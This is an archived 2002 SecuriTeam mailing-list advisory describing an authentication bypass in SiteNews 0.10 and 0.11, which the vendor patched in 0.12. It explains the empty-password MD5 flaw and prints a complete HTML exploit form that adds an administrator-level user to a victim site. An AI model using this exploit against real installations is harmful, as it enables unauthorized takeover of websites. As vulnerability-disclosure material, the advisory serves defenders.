[EXPL] SiteNews Remote Add User
From: support@securiteam.comDate: 02/17/02
- Previous message: support@securiteam.com: "[UNIX] DCP-Portal Root Path Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 17 Feb 2002 00:36:03 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
SiteNews Remote Add User
------------------------------------------------------------------------
SUMMARY
<http://www.linuxnetwork.nl/> SiteNews is an open-source system for
displaying and managing news items on websites. According to its homepage,
it has been downloaded almost 4000 times. A security vulnerability in the
product allows attackers to logon without requiring a valid username and
password.
DETAILS
Vulnerable systems:
SiteNews version 0.10
SiteNews version 0.11
Immune systems:
SiteNews version 0.12
The function GetPassword in function.php returns an empty string, when you
ask for a non-existent username. This, together with the fact that the
program sends usernames in cleartext and passwords as MD5 sums, means that
you can log in without an account, by posting a non-existent username and
the MD5 sum for an empty string as the password. SiteNews has no concept
of user levels, so once you are in you have full control over all news
items and all users.
Vendor status:
The author was contacted with an explanation, an exploit and a patch on
the 5th of February. Version 0.12, which is not vulnerable, was released
on the 7th of February.
Exploit:
To exploit the problem all you need to do is type in a non-existent
username and the user and password combination that you wish to add to the
system, and the exploit creates the new user for you, despite the fact
that you are not authorized.
<html>
<head>
<title>SiteNews Exploit 0.1</title>
</head>
<body bgcolor="#ffffff" text="#000000" link="#000000" alink="#000000"
vlink="#000000">
<h1>SiteNews Exploit 0.1</h1>
<form method="POST"
action="http://www.victim.com/sitenews/admin/add_user.php"
enctype="multipart/form-data">
Written by <a href="mailto:metaur@prontomail.com">Ulf Härnhammar</a>
in 2002.
<p>
This exploit will add a new user to a SiteNews installation. The exploit
user is basically any non-existent user, so you just type some random
characters there.<p>
<br>
<input type="text" name="username" size="20"><br>
<input type="hidden" name="password"
value="d41d8cd98f00b204e9800998ecf8427e" size="0">
<!-- This is the MD5 sum for an empty string. -->
New user:<br>
<input type="text" name="new_user" size="20"><br>
<input type="hidden" name="action1" value="1" size="0">
New password:<br>
<input type="text" name="new_password" size="20"><br>
<input type="submit" value="Exploit it">
</form>
</body>
</html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:ulfh@update.uu.se> Ulf
H{rnhammar.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] DCP-Portal Root Path Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
